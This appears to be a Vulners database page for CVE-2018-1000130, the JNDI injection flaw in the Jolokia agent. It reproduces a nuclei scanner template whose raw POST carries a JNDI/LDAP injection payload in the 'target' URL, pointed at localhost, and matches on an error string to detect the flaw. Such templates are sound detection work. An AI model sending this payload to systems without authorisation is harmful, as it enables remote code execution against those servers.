Lucene search
K

Jolokia Agent - JNDI Code Injection

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 158 Views

Jolokia Agent JNDI Code Injection CVE-2018-1000130 vulnerability allows remote code executio

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2018-1000130
25 Dec 202400:00
circl
CNVD
Jolokia agent JNDI injection vulnerability
27 Mar 201800:00
cnvd
CVE
CVE-2018-1000130
14 Mar 201813:00
cve
Cvelist
CVE-2018-1000130
14 Mar 201813:00
cvelist
Github Security Blog
Injection in Jolokia agent
14 May 202201:27
github
NVD
CVE-2018-1000130
14 Mar 201813:29
nvd
OSV
GHSA-RHQJ-4PP8-VVGF Injection in Jolokia agent
14 May 202201:27
osv
Prion
Design/Logic Flaw
14 Mar 201813:29
prion
RedhatCVE
CVE-2018-1000130
22 Mar 201809:49
redhatcve
RedHat Linux
Important: Red Hat Security Advisory: Fuse 7.1 security update
11 Sep 201807:53
redhat
Rows per page
id: CVE-2018-1000130

info:
  name: Jolokia Agent - JNDI Code Injection
  author: milo2012
  severity: high
  description: |
    Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the vulnerability.
  reference:
    - https://jolokia.org/#Security_fixes_with_1.5.0
    - https://access.redhat.com/errata/RHSA-2018:2669
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000130
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/SexyBeast233/SecBooks
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2018-1000130
    cwe-id: CWE-74
    epss-score: 0.73566
    epss-percentile: 0.99401
    cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: jolokia
    product: webarchive_agent
  tags: cve2018,cve,jolokia,rce,jndi,proxy,vkev,vuln

http:
  - raw:
      - |
        POST /jolokia/read/getDiagnosticOptions HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
        Content-Type: application/x-www-form-urlencoded

        {
           "type":"read",
           "mbean":"java.lang:type=Memory",
           "target":{
              "url":"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"
           }
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100be9c279505d77933c659048d4093674ae1030a76fd92067e6d613c0d02406bba022100aea7f8540e1e8130299a49dbbf41c8040636e21ea54fac4a8de0b92cb2dd4862:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 26.8
CVSS 38.1
EPSS0.73566
158